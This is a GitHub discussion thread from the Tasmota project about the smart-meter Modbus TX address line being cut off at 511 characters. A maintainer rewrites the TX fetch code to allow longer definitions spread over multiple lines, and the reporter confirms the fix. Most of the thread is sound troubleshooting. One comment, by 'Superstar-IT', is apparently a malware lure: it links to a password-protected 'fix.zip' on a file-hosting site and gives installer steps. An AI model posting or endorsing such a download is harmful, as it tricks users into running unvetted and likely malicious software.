### DISCUSSION TITLE
Scripter smart meter interface addresses limit of 511 chars.

### DISCUSSION THREAD

**Discussion by RaphaelSquair** [arendst/Tasmota#22034] [Q&A] [answered]
### PROBLEM DESCRIPTION
I'm trying to read more than 70 adresses using modbus in the smart meter interface (sensor53). Still, after around 54 variables read the dump(sensor53 d1) in the console,  the behavior of the script is to skip to the first address again, i've noted that measuring the lenght of the line to the last address that work before the skip sums to 511 chars. I've found a post that said that rules were implemented in 511 chunks, so i think this is a limitation in the implementation of the scripter code in xdrv_10_scripter.ino. Still, i couldn't find a variable that define a memory allocation of this size.

Coud @gemu2015 , @ascillato2 , and @Jason2866  help me with this? i think it's just a case of resizing a buffer and recompiling my code.

### REQUESTED INFORMATION
_Make sure your have performed every step and checked the applicable boxes before submitting your issue. Thank you!_

- [x] Read the [Contributing Guide and Policy](https://github.com/arendst/Tasmota/blob/development/CONTRIBUTING.md) and [the Code of Conduct](https://github.com/arendst/Tasmota/blob/development/CODE_OF_CONDUCT.md)
- [x] Searched the problem in [issues](https://github.com/arendst/Tasmota/issues)
- [x] Searched the problem in [discussions](https://github.com/arendst/Tasmota/discussions)
- [x] Searched the problem in the [docs](https://tasmota.github.io/docs/FAQ)
- [x] Searched the problem in the [chat](https://discord.gg/Ks2Kzd4)
- [x] Device used (e.g., Sonoff Basic): Esp32
- [x] Tasmota binary firmware version number used: 14.2
  - [ ] Pre-compiled
  - [x] Self-compiled
- [x] Flashing tools used: esptool
- [x] Provide the output of command: `Backlog Template; Module; GPIO 255`:
```lua
  Configuration output here:
{"NAME":"ESP32-DevKit","GPIO":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1],"FLAG":0,"BASE":1}


```
- [x] Provide the output of this command: `00:07:57.524 MQT: DEFAULT/B0B21C4F5B1C/STATUS = {"Status":{"Module":1,"DeviceName":"BABEL","FriendlyName":["BABEL"],"Topic":"DEFAULT/B0B21C4F5B1C","ButtonTopic":"0","Power":"0","PowerLock":"0","PowerOnState":3,"LedState":5,"LedMask":"FFFF","SaveData":1,"SaveState":1,"SwitchTopic":"0","SwitchMode":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"ButtonRetain":0,"SwitchRetain":0,"SensorRetain":0,"PowerRetain":0,"InfoRetain":0,"StateRetain":0,"StatusRetain":0}}
00:07:57.565 MQT: DEFAULT/B0B21C4F5B1C/STATUS1 = {"StatusPRM":{"Baudrate":115200,"SerialConfig":"8N1","GroupTopic":"DEFAULT","OtaUrl":"http://squair-ota-version","RestartReason":"Vbat power on reset","Uptime":"0T01:31:47","StartupUTC":"2024-08-28T01:36:10","Sleep":50,"CfgHolder":4617,"BootCount":6,"BCResetTime":"2024-08-26T01:16:29","SaveCount":12}}
00:07:57.594 MQT: DEFAULT/B0B21C4F5B1C/STATUS2 = {"StatusFWR":{"Version":"14.2.0(tasmota32)","BuildDateTime":"2024-08-25T20:24:25","Core":"3_0_4","SDK":"5.1.4.240801","CpuFrequency":160,"Hardware":"ESP32-D0WDQ6-V3 v3.0","CR":"423/699"}}
00:07:57.621 MQT: DEFAULT/B0B21C4F5B1C/STATUS3 = {"StatusLOG":{"SerialLog":0,"WebLog":2,"MqttLog":0,"SysLog":0,"LogHost":"","LogPort":514,"SSId":["IOT_Squair2","IOT_Squair"],"TelePeriod":300,"Resolution":"558180C0","SetOption":["0000200B","2805C80000000600003C5A0A192800000000","000080C8","00006000","00006000","00000002"]}}
00:07:57.658 MQT: DEFAULT/B0B21C4F5B1C/STATUS4 = {"StatusMEM":{"ProgramSize":1979,"Free":900,"Heap":124,"StackLowMark":3,"PsrMax":0,"PsrFree":0,"ProgramFlashSize":4096,"FlashSize":4096,"FlashChipId":"1640EF","FlashFrequency":80,"FlashMode":"DIO","Features":["0809","958A15DF","0009A001","B7F7BFCF","05DA9BC4","20360C4F","480840D2","20200000","84BC482D","810A80B1","00000014"],"Drivers":"1,2,!3,!4,!5,!8,9,10,11,12,!14,!16,!17,!24,29,!34,38,50,52,!59,!60,62,!63,!66,!67,!68,!73,82,!86,!87,!88,!121","Sensors":"1,2,3,5,6,7,8,9,10,11,12,13,14,15,17,18,19,20,21,22,26,31,34,37,39,40,42,43,45,51,52,53,55,56,58,59,64,66,67,74,85,92,95,98,103,105,109,127","I2CDriver":"7,8,9,10,11,12,13,14,15,17,18,20,24,29,31,36,41,42,44,46,48,58,62,65,69,76,77,82"}}
00:07:57.731 MQT: DEFAULT/B0B21C4F5B1C/STATUS5 = {"StatusNET":{"Hostname":"DEFAULT-B0B21C4F5B1C-SQUAIR","IPAddress":"192.168.1.29","Gateway":"192.168.1.1","Subnetmask":"255.255.255.0","DNSServer1":"192.168.1.1","DNSServer2":"0.0.0.0","Mac":"B0:B2:1C:4F:5B:1C","IP6Global":"","IP6Local":"fe80::b2b2:1cff:fe4f:5b1c%st2","Ethernet":{"Hostname":"","IPAddress":"0.0.0.0","Gateway":"0.0.0.0","Subnetmask":"0.0.0.0","DNSServer1":"192.168.1.1","DNSServer2":"0.0.0.0","Mac":"00:00:00:00:00:00","IP6Global":"","IP6Local":""},"Webserver":2,"HTTP_API":1,"WifiConfig":4,"WifiPower":16.0}}
00:07:57.784 MQT: DEFAULT/B0B21C4F5B1C/STATUS6 = {"StatusMQT":
00:07:57.811 MQT: DEFAULT/B0B21C4F5B1C/STATUS7 = {"StatusTIM":{"UTC":"2024-08-28T03:07:57Z","Local":"2024-08-28T00:07:57","StartDST":"2024-03-31T02:00:00","EndDST":"2024-10-27T03:00:00","Timezone":"-03:00"}}
00:07:57.829 MQT: DEFAULT/B0B21C4F5B1C/STATUS10 = {"StatusSNS":{"Time":"2024-08-28T00:07:57","MAC":"B0:B2:1C:4F:5B:1C","BOOTCOUNT":6,"SIGNAL":-54,"HEAP":130,"UPSEC":5497,"DEVICE":"ME238_TRIPLE","VERSION":"0.0.2-stable","CLIENT":"","FILIAL":"","AREA":","QNT":2"}}
00:07:57.859 MQT: DEFAULT/B0B21C4F5B1C/STATUS11 = {"StatusSTS":{"Time":"2024-08-28T00:07:57","Uptime":"0T01:31:47","UptimeSec":5507,"Heap":122,"SleepMode":"Dynamic","Sleep":50,"LoadAvg":99,"MqttCount":1,"Berry":{"HeapUsed":3,"Objects":41},"Wifi":{"AP":2,"SSId":"IOT_Squair","BSSId":"B2:7F:B9:1D:95:38","Channel":2,"Mode":"HT40","RSSI":92,"Signal":-54,"LinkCount":1,"Downtime":"0T00:00:12"}}}
`:
```lua
  STATUS 0 output here:


```
- [x] Set `weblog` to 4 and then, when you experience your issue, provide the output of the Console log:
```lua
  Console output here:
after applying the command sensor53 d1 the folloing happens 
23:58:01.634 > 02 03 07 dc 00 02 04 b6 
23:58:01.736 > 02 03 0f a6 00 02 27 0f 
23:58:01.836 > 02 03 0f ae 00 02 a6 cd 
23:58:01.938 > 02 03 0f be 00 02 a7 08 
23:58:02.037 > 02 03 0f c6 00 02 27 11 
23:58:02.136 > 03 03 03 e8 00 02 45 99 
23:58:02.236 > 03 03 03 ea 00 02 e4 59    <--- this one is the last requested address that works. after this 
23:58:02.336 > 00 02 80 71                       <--- After that, this happens like it was accessing an illegal address 
23:58:02.436 > 01 03 03 e8 00 02 44 7b    <---And it restart to the first address requested.

```

### TO REPRODUCE
use more than 511 chars in the line of the meter definition and the address after the 512 char will not be sent.

### EXPECTED BEHAVIOUR
the buffer of addresses should work with an unlimited number of addresses of course maintaining within the limitations of memory.
A suggestion, I know that the addresses should stay in one line, but if it were possible to spread the addresses through multiple lines the problem would be more manageable.

### SCREENSHOTS
_If applicable, add screenshots to help explain your problem._

### ADDITIONAL CONTEXT
_Add any other context about the problem here._

**(Please, remember to close the issue when the problem has been addressed)**

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gemu2015** [comment]
simply spread addresses over more lines (is supported)
or read multiple values per address which is much faster (see examples in the docs)

**Comment by RaphaelSquair** [comment]
> simply spread addresses over more lines (is supported) or read multiple values per address which is much faster (see examples in the docs)

Hi @gemu2015 thanks for your reply, i sorry but when i try to spread the addresses over the other lines bellow the first one, the interpreter simply ignores the adresses after the new line. 

07:38:20.657 > 01 03 07 da 00 02 e4 84 
07:38:20.757 > 01 03 07 dc 00 02 04 85 
07:38:20.857 > 01 03 0f a6 00 02 27 3c 
07:38:20.957 > 01 03 0f ae 00 02 a6 fe 
07:38:21.058 > 01 03 0f be 00 02 a7 3b 
07:38:21.158 > 01 03 0f c6 00 02 27 22 
07:38:21.260 > 02 03 03 e8 00 02 44 48 
07:38:21.359 > 00 02 80 71 
07:38:21.495 > 01 03 03 e8 00 02 44 7b 

This is the dump when trying to spread the addresses after the 02 03 03 e8  request , the only diference that i noted is that when i leave the comma in the end of the first line, it create the artifact 00 02 80 71, and when i dont leave the comma in the end the artifact dont apear.

If this feature is supported what could be happening?  i will leave the part of the code with the addresses bellow.

>M 1
+1,9,m,0,19200,DATA,10,1,010303E8,010303EA,010303EC,010303F0,010303F2,010303F4,010303F8,010303FA,01030406,0103040A,0103040C,0103040E,01030412,01030414,01030416,0103041A,0103041C,0103041E,0103042A,010307D8,010307DA,010307DC,01030FA6,01030FAE,01030FBE,01030FC6,020303E8,
020303EA,020303EC,020303F0,020303F2,020303F4,020303F8,020303FA,02030406,0203040A,0203040C,0203040E,02030412,02030414,02030416,0203041A,0203041C,0203041E,0203042A,020307D8,020307DA,020307DC,02030FA6

**Reply by gemu2015** [reply]
no comma at the end of line!

**Comment by RaphaelSquair** [comment]
hi @gemu2015 i tried without the comma, in the first line, with comma in the begining second line, and by last without comma in the begining of the second line all resulted in the same output.

I've looked in the sensor53 file, and found the part of the code where you store the addresses to be sent. 

while (*txp) {
                if (*txp == ',') tx_entries++;
                if (*txp == SCRIPT_EOL) {
                  if (tx_entries > 1) {
                    if (*(txp - 1) != ',' ) {
                      break;
                    }
                    // line ends with ,
                  } else {
                    // single entry
                    break;
                  }
                }
                txp++;
                txlen++;
              }

using comma in the end of the line should end in the first case, that causes a break and without the , in the end it also breaks , 
Also I'm working with windows and i think that by default it adds /r and /n in the end of the lines and looking for this define SCRIPT_EOL i've found it looks only for /n and as you check for (txp - 1) it will find /r and create a break in the else condition. 

Shouldn't one of the options pass and continue the loop in the next line?

**Reply by gemu2015** [reply]
its been a long time ago that i coded this and i don't exactly remember but i think you are right, we need a comma at the end. however cr or cr/lf is NOT supported. you must have LF at the end of line. 
use a windows editor that supports that.
but as said requesting more than one register at a time is strictly preferred as it is much shorter and faster.
example:

```
    >M 1
    +1,[192.168.3.38],m,0,502,mod1,1,10,r01039C870015
    1,=so3,128
    1,01032aUUuu@i0:1,AC Current,A,AC_Current,0
    1,01032ax2UUuu@i0:1,Phase 1 Current,A,Phase_1_Current,0
    1,01032ax4UUuu@i0:1,Phase 2 Current,A,Phase_2_Current,0
    1,01032ax6UUuu@i0:1,Phase 3 Current,A,Phase_3_Current,0
    1,01032ax8SSss@i0:1,Curr Scale Fctr,SF,Curr_SF,0
    1,01032ax16UUuu@i0:1,Phase 1 Voltage,A,Phase_1_Voltage,0
    1,01032ax18UUuu@i0:1,Phase 2 Voltage,A,Phase_2_Voltage,0
    1,01032ax20UUuu@i0:1,Phase 3 Voltage,A,Phase_3_Voltage,0
    1,01032ax22SSss@i0:1,Vltg Scale Fctr,SF,Vltg_SF,0
    1,01032ax24UUuu@i0:1,Output Power,W,Output_Power,0
    1,01032ax26SSss@i0:1,Pwr Scale Fctr,SF,Pwr_SF,0
    1,01032ax28UUuu@i0:1,Frequency,Hz,Frequency,0
    1,01032ax30SSss@i0:1,Freq Scale Fctr,SF,Freq_SF,0
    1,01032ax36UUuu@i0:1,Temperature,C,Temperature,0
    1,01032ax38SSss@i0:1,Temp Scale Fctr,SF,Temp_SF,0
```

**Reply by RaphaelSquair** [reply]
Thanks for the help. I think we are going somewhere now, for what i understood this block of code should indentify the ammount of entries of the tx adresses. but for what i understood it should keep increassing until detecting a comma. correct?
but the problem i see is that independing of having a comma on the newline or not, the  ammount of tx entries stop on the /n char.

I know that the ideal would be to use only one address reading most of the meassurements, but the adresses are far apart and I'm reading from 3 diferent meters.

There would be any way for you to look on what is happening on this part of the code?other way to solve my problem would be to increase the size of the buffer of the read line,  that today is limited to 512.

**Reply by gemu2015** [reply, marked as answer]
i completely recoded the TX fetch section and now it will collect up to 1024 (configurable) chars of TX code spread over several lines when ending with a comma.
try with this source and report if this works for you now.

[xsns_53_sml.ino.zip](https://github.com/user-attachments/files/16792639/xsns_53_sml.ino.zip)

**Reply by RaphaelSquair** [reply]
thank you very much for the help @gemu2015 , i will download and test your modification and will reply here if it worked.

**Reply by RaphaelSquair** [reply]
also thank you for the added effort of allowing replacing vars in the tx fetch section this will help me maintain this section much more organized.

Also just for a clearer understanding, i may change the SML_TRX_BUFF_SIZE in the user config overide file , as long as i have free ram memory correct ? and as it's a define, this will not be changed in a ota to a newer version correct @gemu2015 ?

**Reply by RaphaelSquair** [reply]
@gemu2015  just to let you know. it worked perfectly with more than 511 chars and spread over multiple lines. all address were correctly decoded. 

@arendst  thanks for the awesome work you, gemu and the rest of the tasmota team has been doing.  I think this mod will be a great PR to the project.

**Comment by RaphaelSquair** [comment]
@gemu2015 just to let you know. it worked perfectly with more than 511 chars and spread over multiple lines. all address were correctly decoded.

@arendst thanks for the awesome work you, gemu and the rest of the tasmota team has been doing. I think this mod will be a great PR to the project.

**Comment by RaphaelSquair** [comment]
Hey @gemu2015 and @arendst , just want to know, do you want me to do a PR of this file that gemu posted here? or you prefer to PR the file? is just that it would be my first time doing a PR in tasmota.

**Reply by gemu2015** [reply]
@RaphaelSquair 
i already filed a PR a few days ago.
